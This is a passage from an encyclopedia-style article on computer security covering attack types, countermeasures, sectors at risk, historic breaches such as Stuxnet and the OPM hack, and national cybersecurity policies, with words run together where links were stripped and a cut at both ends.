passwords. This information can then be used to gain access to the individual's real account on the real website. Preying on a victim's trust, phishing can be classified as a form ofsocial engineering. Attackers can use creative ways to gain access to real accounts. A common scam is for attackers to send fake electronic invoices[30]to individuals showing that they recently purchased music, apps, or others, and instructing them to click on a link if the purchases were not authorized. A more strategic type of phishing is spear-phishing which leverages personal or organization-specific details to make the attacker appear like a trusted source. Spear-phishing attacks target specific individuals, rather than the broad net cast by phishing attempts.[31] Privilege escalationdescribes a situation where an attacker with some level of restricted access is able to, without authorization, elevate their privileges or access level.[32]For example, a standard computer user may be able to exploit avulnerabilityin the system to gain access to restricted data; or even becomerootand have full unrestricted access to a system. The severity of attacks can range from attacks simply sending an unsolicited email to aransomware attackon large amounts of data. Privilege escalation usually starts withsocial engineeringtechniques, oftenphishing.[32] Privilege escalation can be separated into two strategies, horizontal and vertical privilege escalation: Any computational system affects its environment in some form. This effect it has on its environment can range from electromagnetic radiation, to residual effect on RAM cells which as a consequence make aCold boot attackpossible, to hardware implementation faults that allow for access or guessing of other values that normally should be inaccessible. In Side-channel attack scenarios, the attacker would gather such information about a system or network to guess its internal state and as a result access the information which is assumed by the victim to be secure. The target information in a side channel can be challenging to detect due to its low amplitude when combined with other signals[33] Social engineering, in the context of computer security, aims to convince a user to disclose secrets such as passwords, card numbers, etc. or grant physical access by, for example, impersonating a senior executive, bank, a contractor, or a customer.[34]This generally involves exploiting people's trust, and relying on theircognitive biases. A common scam involves emails sent to accounting and finance department personnel, impersonating their CEO and urgently requesting some action. One of the main techniques of social engineering arephishingattacks. In early 2016, theFBIreported that suchbusiness email compromise(BEC) scams had cost US businesses more than $2 billion in about two years.[35] In May 2016, theMilwaukee BucksNBAteam was the victim of this type of cyber scam with a perpetrator impersonating the team's presidentPeter Feigin, resulting in the handover of all the team's employees' 2015W-2tax forms.[36] Spoofing is an act of pretending to be a valid entity through the falsification of data (such as an IP address or username), in order to gain access to information or resources that one is otherwise unauthorized to obtain. Spoofing is closely related tophishing.[37][38]There are several types of spoofing, including: In 2018, the cybersecurity firmTrellixpublished research on the life-threatening risk of spoofing in the healthcare industry.[40] Tamperingdescribes amalicious modificationor alteration of data. It is an intentional but unauthorized act resulting in the modification of a system, components of systems, its intended behavior, or data. So-calledEvil Maid attacksand security services planting ofsurveillancecapability into routers are examples.[41] HTMLsmuggling allows an attacker tosmugglea malicious code inside a particular HTML or web page.[42]HTMLfiles can carry payloads concealed as benign, inert data in order to defeatcontent filters. These payloads can be reconstructed on the other side of the filter.[43] When a target user opens the HTML, the malicious code is activated; the web browser thendecodesthe script, which then unleashes the malware onto the target's device.[42] Employee behavior can have a big impact oninformation securityin organizations. Cultural concepts can help different segments of the organization work effectively or work against effectiveness toward information security within an organization. Information security culture is the "...totality of patterns of behavior in an organization that contributes to the protection of information of all kinds."[44] Andersson and Reimers (2014) found that employees often do not see themselves as part of their organization's information security effort and often take actions that impede organizational changes.[45]Indeed, the Verizon Data Breach Investigations Report 2020, which examined 3,950 security breaches, discovered 30% of cybersecurity incidents involved internal actors within a company.[46]Research shows information security culture needs to be improved continuously. In "Information Security Culture from Analysis to Change", authors commented, "It's a never-ending process, a cycle of evaluation and change or maintenance." To manage the information security culture, five steps should be taken: pre-evaluation, strategic planning, operative planning, implementation, and post-evaluation.[47] In computer security, acountermeasureis an action, device, procedure or technique that reduces a threat, a vulnerability, or anattackby eliminating or preventing it, by minimizing the harm it can cause, or by discovering and reporting it so that corrective action can be taken.[48][49][50] Some common countermeasures are listed in the following sections: Security by design, or alternately secure by design, means that the software has been designed from the ground up to be secure. In this case, security is considered a main feature. The UK government's National Cyber Security Centre separates secure cyber design principles into five sections:[51] These design principles of security by design can include some of the following techniques: Security architecture can be defined as the "practice of designing computer systems to achieve security goals."[52]These goals have overlap with the principles of "security by design" explored above, including to "make initial compromise of the system difficult," and to "limit the impact of any compromise."[52]In practice, the role of a security architect would be to ensure the structure of a system reinforces the security of the system, and that new changes are safe and meet the security requirements of the organization.[53][54] Similarly, Techopedia defines security architecture as "a unified security design that addresses the necessities and potential risks involved in a certain scenario or environment. It also specifies when and where to apply security controls. The design process is generally reproducible." The key attributes of security architecture are:[55] Practicing security architecture provides the right foundation to systematically address business, IT and security concerns in an organization. A state of computer security is the conceptual ideal, attained by the use of three processes: threat prevention, detection, and response. These processes are based on various policies and system components, which include the following: Today, computer security consists mainly of preventive measures, likefirewallsor anexit procedure. A firewall can be defined as a way of filtering network data between a host or a network and another network, such as theInternet. They can be implemented as software running on the machine, hooking into thenetwork stack(or, in the case of mostUNIX-based operating systems such asLinux, built into the operating systemkernel) to provide real-time filtering and blocking.[56]Another implementation is a so-calledphysical firewall, which consists of a separate machine filtering network traffic. Firewalls are common amongst machines that are permanently connected to the Internet. Some organizations are turning tobig dataplatforms, such asApache Hadoop, to extend data accessibility andmachine learningto detectadvanced persistent threats.[58] In order to ensure adequate security, the confidentiality, integrity and availability of a network, better known as the CIA triad, must be protected and is considered the foundation to information security.[59]To achieve those objectives, administrative, physical and technical security measures should be employed. The amount of security afforded to an asset can only be determined when its value is known.[60] Vulnerability management is the cycle of identifying, fixing or mitigatingvulnerabilities,[61]especially in software andfirmware. Vulnerability management is integral to computer security andnetwork security. Vulnerabilities can be discovered with avulnerability scanner, which analyzes a computer system in search of known vulnerabilities,[62]such asopen ports, insecure software configuration, and susceptibility tomalware. In order for these tools to be effective, they must be kept up to date with every new update the vendor release. Typically, these updates will scan for the new vulnerabilities that were introduced recently. Beyond vulnerability scanning, many organizations contract outside security auditors to run regularpenetration testsagainst their systems to identify vulnerabilities. In some sectors, this is a contractual requirement.[63] The act of assessing and reducing vulnerabilities to cyber attacks is commonly referred to asinformation technology security assessments. They aim to assess systems for risk and to predict and test for their vulnerabilities. Whileformal verificationof the correctness of computer systems is possible,[64][65]it is not yet common. Operating systems formally verified includeseL4,[66]andSYSGO'sPikeOS[67][68]– but these make up a very small percentage of the market. It is possible to reduce an attacker's chances by keeping systems up to date with security patches and updates and by hiring people with expertise in security. Large companies with significant threats can hire Security Operations Centre (SOC) Analysts. These are specialists in cyber defences, with their role ranging from "conducting threat analysis to investigating reports of any new issues and preparing and testing disaster recovery plans."[69] Whilst no measures can completely guarantee the prevention of an attack, these measures can help mitigate the damage of possible attacks. The effects of data loss/damage can be also reduced by carefulbacking upandinsurance. Outside of formal assessments, there are various methods of reducing vulnerabilities.Two factor authenticationis a method for mitigating unauthorized access to a system or sensitive information.[70]It requiressomething you know:a password or PIN, andsomething you have: a card, dongle, cellphone, or another piece of hardware. This increases security as an unauthorized person needs both of these to gain access. Protecting against social engineering and direct computer access (physical) attacks can only happen by non-computer means, which can be difficult to enforce, relative to the sensitivity of the information. Training is often involved to help mitigate this risk by improving people's knowledge of how to protect themselves and by increasing people's awareness of threats.[71]However, even in highly disciplined environments (e.g. military organizations), social engineering attacks can still be difficult to foresee and prevent. Inoculation, derived frominoculation theory, seeks to prevent social engineering and other fraudulent tricks and traps by instilling a resistance to persuasion attempts through exposure to similar or related attempts.[72] Hardware-based or assisted computer security also offers an alternative to software-only computer security. Using devices and methods such asdongles,trusted platform modules, intrusion-aware cases, drive locks, disabling USB ports, and mobile-enabled access may be considered more secure due to the physical access (or sophisticated backdoor access) required in order to be compromised. Each of these is covered in more detail below. One use of the termcomputer securityrefers to technology that is used to implementsecure operating systems. Using secure operating systems is a good way of ensuring computer security. These are systems that have achieved certification from an external security-auditing organization, the most popular evaluations areCommon Criteria(CC).[86] In software engineering,secure codingaims to guard against the accidental introduction of security vulnerabilities. It is also possible to create software designed from the ground up to be secure. Such systems aresecure by design. Beyond this, formal verification aims to prove thecorrectnessof thealgorithmsunderlying a system;[87]important forcryptographic protocolsfor example. Within computer systems, two of the mainsecurity modelscapable of enforcing privilege separation areaccess control lists(ACLs) androle-based access control(RBAC). Anaccess-control list(ACL), with respect to a computer file system, is a list of permissions associated with an object. An ACL specifies which users or system processes are granted access to objects, as well as what operations are allowed on given objects. Role-based access control is an approach to restricting system access to authorized users,[88][89][90]used by the majority of enterprises with more than 500 employees,[91]and can implementmandatory access control(MAC) ordiscretionary access control(DAC). A further approach,capability-based securityhas been mostly restricted to research operating systems. Capabilities can, however, also be implemented at the language level, leading to a style of programming that is essentially a refinement of standard object-oriented design. An open-source project in the area is theE language. The end-user is widely recognized as the weakest link in the security chain[92]and it is estimated that more than 90% of security incidents and breaches involve some kind of human error.[93][94]Among the most commonly recorded forms of errors and misjudgment are poor password management, sending emails containing sensitive data and attachments to the wrong recipient, the inability to recognize misleading URLs and to identify fake websites and dangerous email attachments. A common mistake that users make is saving their user id/password in their browsers to make it easier to log in to banking sites. This is a gift to attackers who have obtained access to a machine by some means. The risk may be mitigated by the use of two-factor authentication.[95] As the human component of cyber risk is particularly relevant in determining the global cyber risk[96]an organization is facing, security awareness training, at all levels, not only provides formal compliance with regulatory and industry mandates but is considered essential[97]in reducing cyber risk and protecting individuals and companies from the great majority of cyber threats. The focus on the end-user represents a profound cultural change for many security practitioners, who have traditionally approached cybersecurity exclusively from a technical perspective, and moves along the lines suggested by major security centers[98]to develop a culture of cyber awareness within the organization, recognizing that a security-aware user provides an important line of defense against cyber attacks. Related to end-user training,digital hygieneorcyber hygieneis a fundamental principle relating to information security and, as the analogy withpersonal hygieneshows, is the equivalent of establishing simple routine measures to minimize the risks from cyber threats. The assumption is that good cyber hygiene practices can give networked users another layer of protection, reducing the risk that one vulnerable node will be used to either mount attacks or compromise another node or network, especially from common cyberattacks.[99]Cyber hygiene should also not be mistaken forproactive cyber defence, a military term.[100] The most common acts of digital hygiene can include updating malware protection, cloud back-ups, passwords, and ensuring restricted admin rights and network firewalls.[101]As opposed to a purely technology-based defense against threats, cyber hygiene mostly regards routine measures that are technically simple to implement and mostly dependent on discipline[102]or education.[103]It can be thought of as an abstract list of tips or measures that have been demonstrated as having a positive effect on personal or collective digital security. As such, these measures can be performed by laypeople, not just security experts. Cyber hygiene relates to personal hygiene as computer viruses relate to biological viruses (or pathogens). However, while the termcomputer viruswas coined almost simultaneously with the creation of the first working computer viruses,[104]the termcyber hygieneis a much later invention, perhaps as late as 2000[105]by Internet pioneerVint Cerf. It has since been adopted by theCongress[106]andSenateof the United States,[107]the FBI,[108]EUinstitutions[99]and heads of state.[100] Responding to attemptedsecurity breachesis often very difficult for a variety of reasons, including: Where an attack succeeds and a breach occurs, many jurisdictions now have in place mandatorysecurity breach notification laws. The growth in the number of computer systems and the increasing reliance upon them by individuals, businesses, industries, and governments means that there are an increasing number of systems at risk. The computer systems of financial regulators and financial institutions like theU.S. Securities and Exchange Commission, SWIFT, investment banks, and commercial banks are prominent hacking targets forcybercriminalsinterested in manipulating markets and making illicit gains.[109]Websites and apps that accept or storecredit card numbers, brokerage accounts, andbank accountinformation are also prominent hacking targets, because of the potential for immediate financial gain from transferring money, making purchases, or selling the information on theblack market.[110]In-store payment systems andATMshave also been tampered with in order to gather customer account data andPINs. TheUCLAInternet Report: Surveying the Digital Future (2000) found that the privacy of personal data created barriers to online sales and that more than nine out of 10 internet users were somewhat or very concerned aboutcredit cardsecurity.[111] The most common web technologies for improving security between browsers and websites are named SSL (Secure Sockets Layer), and its successor TLS (Transport Layer Security),identity managementandauthenticationservices, anddomain nameservices allow companies and consumers to engage in secure communications and commerce. Several versions of SSL and TLS are commonly used today in applications such as web browsing, e-mail, internet faxing,instant messaging, andVoIP(voice-over-IP). There are variousinteroperableimplementations of these technologies, including at least one implementation that isopen source. Open source allows anyone to view the application'ssource code, and look for and report vulnerabilities. The credit card companiesVisaandMasterCardcooperated to develop the secureEMVchip which is embedded in credit cards. Further developments include theChip Authentication Programwhere banks give customers hand-held card readers to perform online secure transactions. Other developments in this arena include the development of technology such as Instant Issuance which has enabled shoppingmall kiosksacting on behalf of banks to issue on-the-spot credit cards to interested customers. Computers control functions at many utilities, including coordination oftelecommunications, thepower grid,nuclear power plants, and valve opening and closing in water and gas networks. The Internet is a potential attack vector for such machines if connected, but theStuxnetworm demonstrated that even equipment controlled by computers not connected to the Internet can be vulnerable. In 2014, theComputer Emergency Readiness Team, a division of theDepartment of Homeland Security, investigated 79 hacking incidents at energy companies.[112] Theaviationindustry is very reliant on a series of complex systems which could be attacked.[113]A simple power outage at one airport can cause repercussions worldwide,[114]much of the system relies on radio transmissions which could be disrupted,[115]and controlling aircraft over oceans is especially dangerous because radar surveillance only extends 175 to 225 miles offshore.[116]There is also potential for attack from within an aircraft.[117] Implementing fixes in aerospace systems poses a unique challenge because efficient air transportation is heavily affected by weight and volume. Improving security by adding physical devices to airplanes could increase their unloaded weight, and could potentially reduce cargo or passenger capacity.[118] In Europe, with the (Pan-European Network Service)[119]and NewPENS,[120]and in the US with the NextGen program,[121]air navigation service providersare moving to create their own dedicated networks. Many modern passports are nowbiometric passports, containing an embeddedmicrochipthat stores a digitized photograph and personal information such as name, gender, and date of birth. In addition, more countries[which?]are introducingfacial recognition technologyto reduceidentity-related fraud. The introduction of the ePassport has assisted border officials in verifying the identity of the passport holder, thus allowing for quick passenger processing.[122]Plans are under way in the US, theUK, andAustraliato introduce SmartGate kiosks with both retina andfingerprint recognitiontechnology.[123]The airline industry is moving from the use of traditional paper tickets towards the use ofelectronic tickets(e-tickets). These have been made possible by advances in online credit card transactions in partnership with the airlines. Long-distance bus companies[which?]are also switching over to e-ticketing transactions today. The consequences of a successful attack range from loss of confidentiality to loss of system integrity,air traffic controloutages, loss of aircraft, and even loss of life. Desktop computers and laptops are commonly targeted to gather passwords or financial account information or to construct a botnet to attack another target.Smartphones,tablet computers,smart watches, and othermobile devicessuch asquantified selfdevices likeactivity trackershave sensors such as cameras, microphones, GPS receivers, compasses, andaccelerometerswhich could be exploited, and may collect personal information, including sensitive health information. WiFi, Bluetooth, and cell phone networks on any of these devices could be used as attack vectors, and sensors might be remotely activated after a successful breach.[124] The increasing number ofhome automationdevices such as theNest thermostatare also potential targets.[124] Today many healthcare providers andhealth insurancecompanies use the internet to provide enhanced products and services. Examples are the use oftele-healthto potentially offer better quality and access to healthcare, or fitness trackers to lower insurance premiums.[citation needed]Patient records are increasingly being placed on secure in-house networks, alleviating the need for extra storage space.[125] Large corporations are common targets. In many cases attacks are aimed at financial gain throughidentity theftand involvedata breaches. Examples include the loss of millions of clients' credit card and financial details byHome Depot,[126]Staples,[127]Target Corporation,[128]andEquifax.[129] Medical records have been targeted in general identify theft, health insurance fraud, and impersonating patients to obtain prescription drugs for recreational purposes or resale.[130]Although cyber threats continue to increase, 62% of all organizations did not increase security training for their business in 2015.[131] Not all attacks are financially motivated, however: security firmHBGary Federalhad a serious series of attacks in 2011 fromhacktivistgroupAnonymousin retaliation for the firm's CEO claiming to have infiltrated their group,[132][133]andSony Pictureswashacked in 2014with the apparent dual motive of embarrassing the company through data leaks and crippling the company by wiping workstations and servers.[134][135] Vehicles are increasingly computerized, with engine timing,cruise control,anti-lock brakes, seat belt tensioners, door locks,airbagsandadvanced driver-assistance systemson many models. Additionally,connected carsmay use WiFi and Bluetooth to communicate with onboard consumer devices and the cell phone network.[136]Self-driving carsare expected to be even more complex. All of these systems carry some security risks, and such issues have gained wide attention.[137][138][139] Simple examples of risk include a maliciouscompact discbeing used as an attack vector,[140]and the car's onboard microphones being used for eavesdropping. However, if access is gained to a car's internalcontroller area network, the danger is much greater[136]– and in a widely publicized 2015 test, hackers remotely carjacked a vehicle from 10 miles away and drove it into a ditch.[141][142] Manufacturers are reacting in numerous ways, withTeslain 2016 pushing out some security fixesover the airinto its cars' computer systems.[143]In the area of autonomous vehicles, in September 2016 theUnited States Department of Transportationannounced some initial safety standards, and called for states to come up with uniform policies.[144][145][146] Additionally, e-Drivers' licenses are being developed using the same technology. For example, Mexico's licensing authority (ICV) has used a smart card platform to issue the first e-Drivers' licenses to the city ofMonterrey, in the state ofNuevo León.[147] Shipping companies[148]have adoptedRFID(Radio Frequency Identification) technology as an efficient, digitally secure,tracking device. Unlike abarcode, RFID can be read up to 20 feet away. RFID is used byFedEx[149]andUPS.[150] Government andmilitarycomputer systems are commonly attacked by activists[151][152][153]and foreign powers.[154][155][156][157]Local and regional government infrastructure such astraffic lightcontrols, police and intelligence agency communications,personnel records, as well as student records.[158] TheFBI,CIA, andPentagon, all utilize secure controlled access technology for any of their buildings. However, the use of this form of technology is spreading into the entrepreneurial world. More and more companies are taking advantage of the development of digitally secure controlled access technology. GE's ACUVision, for example, offers a single panel platform for access control, alarm monitoring and digital recording.[159] TheInternet of things(IoT) is the network of physical objects such as devices, vehicles, and buildings that areembeddedwithelectronics,software,sensors, andnetwork connectivitythat enables them to collect and exchange data.[160]Concerns have been raised that this is being developed without appropriate consideration of the security challenges involved.[161][162] While the IoT creates opportunities for more direct integration of the physical world into computer-based systems,[163][164]it also provides opportunities for misuse. In particular, as the Internet of Things spreads widely, cyberattacks are likely to become an increasingly physical (rather than simply virtual) threat.[165]If a front door's lock is connected to the Internet, and can be locked/unlocked from a phone, then a criminal could enter the home at the press of a button from a stolen or hacked phone. People could stand to lose much more than their credit card numbers in a world controlled by IoT-enabled devices. Thieves have also used electronic means to circumvent non-Internet-connected hotel door locks.[166] An attack aimed at physical infrastructure or human lives is often called a cyber-kinetic attack. As IoT devices and appliances become more widespread, the prevalence and potential damage of cyber-kinetic attacks can increase substantially. Medical deviceshave either been successfully attacked or had potentially deadly vulnerabilities demonstrated, including both in-hospital diagnostic equipment[167]and implanted devices includingpacemakers[168]andinsulin pumps.[169]There are many reports of hospitals and hospital organizations getting hacked, includingransomwareattacks,[170][171][172][173]Windows XPexploits,[174][175]viruses,[176][177]and data breaches of sensitive data stored on hospital servers.[178][171][179][180]On 28 December 2016 the USFood and Drug Administrationreleased its recommendations for how medicaldevice manufacturersshould maintain the security of Internet-connected devices – but no structure for enforcement.[181][182] In distributed generation systems, the risk of a cyber attack is real, according toDaily Energy Insider. An attack could cause a loss of power in a large area for a long period of time, and such an attack could have just as severe consequences as a natural disaster. The District of Columbia is considering creating a Distributed Energy Resources (DER) Authority within the city, with the goal being for customers to have more insight into their own energy use and giving the local electric utility,Pepco, the chance to better estimate energy demand. The D.C. proposal, however, would "allow third-party vendors to create numerous points of energy distribution, which could potentially create more opportunities for cyber attackers to threaten the electric grid."[183] Perhaps the most widely known digitally secure telecommunication device is theSIM(Subscriber Identity Module) card, a device that is embedded in most of the world's cellular devices before any service can be obtained. The SIM card is just the beginning of this digitally secure environment. The Smart Card Web Servers draft standard (SCWS) defines the interfaces to anHTTP serverin asmart card.[184]Tests are being conducted to secure OTA ("over-the-air") payment and credit card information from and to a mobile phone. Combination SIM/DVD devices are being developed through Smart Video Card technology which embeds aDVD-compliantoptical discinto the card body of a regular SIM card. Other telecommunication developments involving digital security includemobile signatures, which use the embedded SIM card to generate a legally bindingelectronic signature. Serious financial damage has been caused bysecurity breaches, but because there is no standard model for estimating the cost of an incident, the only data available is that which is made public by the organizations involved. "Several computer security consulting firms produce estimates of total worldwide losses attributable tovirusand worm attacks and to hostile digital acts in general. The 2003 loss estimates by these firms range from $13 billion (worms and viruses only) to $226 billion (for all forms of covert attacks). The reliability of these estimates is often challenged; the underlying methodology is basically anecdotal."[185] However, reasonable estimates of the financial cost of security breaches can actually help organizations make rational investment decisions. According to the classicGordon-Loeb Modelanalyzing the optimal investment level in information security, one can conclude that the amount a firm spends to protect information should generally be only a small fraction of the expected loss (i.e., theexpected valueof the loss resulting from a cyber/informationsecurity breach).[186] As withphysical security, the motivations for breaches of computer security vary between attackers. Some are thrill-seekers orvandals, some are activists, others are criminals looking for financial gain. State-sponsored attackers are now common and well resourced but started with amateurs such as Markus Hess who hacked for theKGB, as recounted byClifford StollinThe Cuckoo's Egg. Attackers motivations can vary for all types of attacks from pleasure to political goals.[15]For example, hacktivists may target a company or organization that carries out activities they do not agree with. This would be to create bad publicity for the company by having its website crash. High capability hackers, often with larger backing or state sponsorship, may attack based on the demands of their financial backers. These attacks are more likely to attempt more serious attack. An example of a more serious attack was the2015 Ukraine power grid hack, which reportedly utilised the spear-phising, destruction of files, and denial-of-service attacks to carry out the full attack.[187][188] Additionally, recent attacker motivations can be traced back to extremist organizations seeking to gain political advantage or disrupt social agendas.[189]The growth of the internet, mobile technologies, and inexpensive computing devices have led to a rise in capabilities but also to the risk to environments that are deemed as vital to operations. All critical targeted environments are susceptible to compromise and this has led to a series of proactive studies on how to migrate the risk by taking into consideration motivations by these types of actors. Several stark differences exist between the hacker motivation and that ofnation stateactors seeking to attack based on an ideological preference.[190] A key aspect of threat modeling for any system is identifying the motivations behind potential attacks and the individuals or groups likely to carry them out. The level and detail of security measures will differ based on the specific system being protected. For instance, a home personal computer, a bank, and a classified military network each face distinct threats, despite using similar underlying technologies.[191] Computer security incident managementis an organized approach to addressing and managing the aftermath of a computer security incident or compromise with the goal of preventing a breach or thwarting a cyberattack. An incident that is not identified and managed at the time of intrusion typically escalates to a more damaging event such as adata breachor system failure. The intended outcome of a computer security incident response plan is to contain the incident, limit damage and assist recovery to business as usual. Responding to compromises quickly can mitigate exploited vulnerabilities, restore services and processes and minimize losses.[192]Incident response planning allows an organization to establish a series of best practices to stop an intrusion before it causes damage. Typical incident response plans contain a set of written instructions that outline the organization's response to a cyberattack. Without a documented plan in place, an organization may not successfully detect an intrusion or compromise and stakeholders may not understand their roles, processes and procedures during an escalation, slowing the organization's response and resolution. There are four key components of a computer security incident response plan: Some illustrative examples of different types of computer security breaches are given below. In 1988, 60,000 computers were connected to the Internet, and most were mainframes, minicomputers and professional workstations. On 2 November 1988, many started to slow down, because they were running a malicious code that demanded processor time and that spread itself to other computers – the first internetcomputer worm.[194]The software was traced back to 23-year-oldCornell Universitygraduate studentRobert Tappan Morriswho said "he wanted to count how many machines were connected to the Internet".[194] In 1994, over a hundred intrusions were made by unidentified crackers into theRome Laboratory, the US Air Force's main command and research facility. Usingtrojan horses, hackers were able to obtain unrestricted access to Rome's networking systems and remove traces of their activities. The intruders were able to obtain classified files, such as air tasking order systems data and furthermore able to penetrate connected networks ofNational Aeronautics and Space Administration's Goddard Space Flight Center, Wright-Patterson Air Force Base, some Defense contractors, and other private sector organizations, by posing as a trusted Rome center user.[195] In early 2007, American apparel and home goods companyTJXannounced that it was the victim of anunauthorized computer systems intrusion[196]and that the hackers had accessed a system that stored data oncredit card,debit card,check, and merchandise return transactions.[197] In 2010, the computer worm known asStuxnetreportedly ruined almost one-fifth of Iran'snuclear centrifuges.[198]It did so by disrupting industrialprogrammable logic controllers(PLCs) in a targeted attack. This is generally believed to have been launched by Israel and the United States to disrupt Iran's nuclear program[199][200][201][202]– although neither has publicly admitted this. In early 2013, documents provided byEdward Snowdenwere published byThe Washington PostandThe Guardian[203][204]exposing the massive scale ofNSAglobal surveillance. There were also indications that the NSA may have inserted a backdoor in aNISTstandard for encryption.[205]This standard was later withdrawn due to widespread criticism.[206]The NSA additionally were revealed to have tapped the links betweenGoogle's data centers.[207] A Ukrainian hacker known asRescatorbroke intoTarget Corporationcomputers in 2013, stealing roughly 40 million credit cards,[208]and thenHome Depotcomputers in 2014, stealing between 53 and 56 million credit card numbers.[209]Warnings were delivered at both corporations, but ignored; physical security breaches usingself checkout machinesare believed to have played a large role. "The malware utilized is absolutely unsophisticated and uninteresting," says Jim Walter, director of threat intelligence operations at security technology company McAfee – meaning that the heists could have easily been stopped by existingantivirus softwarehad administrators responded to the warnings. The size of the thefts has resulted in major attention from state and Federal United States authorities and the investigation is ongoing. In April 2015, theOffice of Personnel Managementdiscovered it had been hackedmore than a year earlier in a data breach, resulting in the theft of approximately 21.5 million personnel records handled by the office.[210]The Office of Personnel Management hack has been described by federal officials as among the largest breaches of government data in the history of the United States.[211]Data targeted in the breach includedpersonally identifiable informationsuch asSocial Security numbers, names, dates and places of birth, addresses, and fingerprints of current and former government employees as well as anyone who had undergone a government background check.[212][213]It is believed the hack was perpetrated by Chinese hackers.[214] In July 2015, a hacker group is known as The Impact Team successfully breached the extramarital relationship website Ashley Madison, created by Avid Life Media. The group claimed that they had taken not only company data but user data as well. After the breach, The Impact Team dumped emails from the company's CEO, to prove their point, and threatened to dump customer data unless the website was taken down permanently.[215]When Avid Life Media did not take the site offline the group released two more compressed files, one 9.7GB and the second 20GB. After the second data dump, Avid Life Media CEO Noel Biderman resigned; but the website remained to function. In June 2021, the cyber attack took down the largest fuel pipeline in the U.S. and led to shortages across the East Coast.[216] International legal issues of cyber attacks are complicated in nature. There is no global base of common rules to judge, and eventually punish, cybercrimes and cybercriminals - and where security firms or agencies do locate the cybercriminal behind the creation of a particular piece ofmalwareor form ofcyber attack, often the local authorities cannot take action due to lack of laws under which to prosecute.[217][218]Provingattribution for cybercrimes and cyberattacksis also a major problem for all law enforcement agencies. "Computer virusesswitch from one country to another, from one jurisdiction to another – moving around the world, using the fact that we don't have the capability to globally police operations like this. So the Internet is as if someone [had] given free plane tickets to all the online criminals of the world."[217]The use of techniques such asdynamic DNS,fast fluxandbullet proof serversadd to the difficulty of investigation and enforcement. The role of the government is to makeregulationsto force companies and organizations to protect their systems, infrastructure and information from any cyberattacks, but also to protect its own national infrastructure such as the nationalpower-grid.[219] The government's regulatory role incyberspaceis complicated. For some, cyberspace was seen as avirtual spacethat was to remain free of government intervention, as can be seen in many of today's libertarianblockchainandbitcoindiscussions.[220] Many government officials and experts think that the government should do more and that there is a crucial need for improved regulation, mainly due to the failure of the private sector to solve efficiently the cybersecurity problem.R. Clarkesaid during a panel discussion at theRSA Security ConferenceinSan Francisco, he believes that the "industry only responds when you threaten regulation. If the industry doesn't respond (to the threat), you have to follow through."[221]On the other hand, executives from the private sector agree that improvements are necessary, but think that government intervention would affect their ability to innovate efficiently. Daniel R. McCarthy analyzed this public-private partnership in cybersecurity and reflected on the role of cybersecurity in the broader constitution of political order.[222] On 22 May 2020, the UN Security Council held its second ever informal meeting on cybersecurity to focus on cyber challenges tointernational peace. According to UN Secretary-GeneralAntónio Guterres, new technologies are too often used to violate rights.[223] Many different teams and organizations exist, including: On 14 April 2016, theEuropean Parliamentand theCouncil of the European Unionadopted theGeneral Data Protection Regulation(GDPR). The GDPR, which came into force on 25 May 2018, grants individuals within the European Union (EU) and the European Economic Area (EEA) the right to theprotection of personal data. The regulation requires that any entity that processes personal data incorporate data protection by design and by default. It also requires that certain organizations appoint a Data Protection Officer (DPO). The IT Security AssociationTeleTrusTexist inGermanysince June 1986, which is an international competence network for IT security. Most countries have their own computer emergency response team to protect network security. Since 2010, Canada has had a cybersecurity strategy.[229][230]This functions as a counterpart document to the National Strategy and Action Plan for Critical Infrastructure.[231]The strategy has three main pillars: securing government systems, securing vital private cyber systems, and helping Canadians to be secure online.[230][231]There is also a Cyber Incident Management Framework to provide a coordinated response in the event of a cyber incident.[232][233] TheCanadian Cyber Incident Response Centre(CCIRC) is responsible for mitigating and responding to threats to Canada's critical infrastructure and cyber systems. It provides support to mitigate cyber threats, technical support to respond & recover from targeted cyber attacks, and provides online tools for members of Canada's critical infrastructure sectors.[234]It posts regular cybersecurity bulletins[235]& operates an online reporting tool where individuals and organizations can report a cyber incident.[236] To inform the general public on how to protect themselves online, Public Safety Canada has partnered with STOP.THINK.CONNECT, a coalition of non-profit, private sector, and government organizations,[237]and launched the Cyber Security Cooperation Program.[238][239]They also run the GetCyberSafe portal for Canadian citizens, and Cyber Security Awareness Month during October.[240] Public Safety Canada aims to begin an evaluation of Canada's cybersecurity strategy in early 2015.[231] Australian federal governmentannounced an $18.2 million investment to fortify thecybersecurityresilience of small and medium enterprises (SMEs) and enhance their capabilities in responding to cyber threats. This financial backing is an integral component of the soon-to-be-unveiled2023-2030 Australian Cyber Security Strategy, slated for release within the current week. A substantial allocation of $7.2 million is earmarked for the establishment of a voluntary cyber health check program, facilitating businesses in conducting a comprehensive and tailored self-assessment of their cybersecurity upskill. This avant-garde health assessment serves as a diagnostic tool, enabling enterprises to ascertain the robustness ofAustralia's cyber security regulations. Furthermore, it affords them access to a repository of educational resources and materials, fostering the acquisition of skills necessary for an elevated cybersecurity posture. This groundbreaking initiative was jointly disclosed by Minister for Cyber SecurityClare O'Neiland Minister for Small BusinessJulie Collins.[241] Some provisions for cybersecurity have been incorporated into rules framed under the Information Technology Act 2000.[242] TheNational Cyber Security Policy 2013is a policy framework by the Ministry of Electronics and Information Technology (MeitY) which aims to protect the public and private infrastructure from cyberattacks, and safeguard "information, such as personal information (of web users), financial and banking information and sovereign data".CERT- Inis the nodal agency which monitors the cyber threats in the country. The post ofNational Cyber Security Coordinatorhas also been created in thePrime Minister's Office (PMO). The Indian Companies Act 2013 has also introduced cyber law and cybersecurity obligations on the part of Indian directors. Some provisions for cybersecurity have been incorporated into rules framed under the Information Technology Act 2000 Update in 2013.[243] Following cyberattacks in the first half of 2013, when the government, news media, television stations, and bank websites were compromised, the national government committed to the training of 5,000 new cybersecurity experts by 2017. The South Korean government blamed its northern counterpart for these attacks, as well as incidents that occurred in 2009, 2011,[244]and 2012, but Pyongyang denies the accusations.[245] TheUnited Stateshas its first fully formed cyber plan in 15 years, as a result of the release of this National Cyber plan.[246]In this policy, the US says it will: Protect the country by keeping networks, systems, functions, and data safe; Promote American wealth by building a strong digital economy and encouraging strong domestic innovation; Peace and safety should be kept by making it easier for the US to stop people from using computer tools for bad things, working with friends and partners to do this; and increase the United States' impact around the world to support the main ideas behind an open, safe, reliable, and compatible Internet.[247] The new U.S. cyber strategy[248]seeks to allay some of those concerns by promoting responsible behavior incyberspace, urging nations to adhere to a set of norms, both through international law and voluntary standards. It also calls for specific measures to harden U.S. government networks from attacks, like the June 2015 intrusion into theU.S. Office of Personnel Management(OPM), which compromised the records of about 4.2 million current and former government employees. And the strategy calls for the U.S. to continue to name and shame bad cyber actors, calling them out publicly for attacks when possible, along with the use of economic sanctions and diplomatic pressure.[249] The 198618 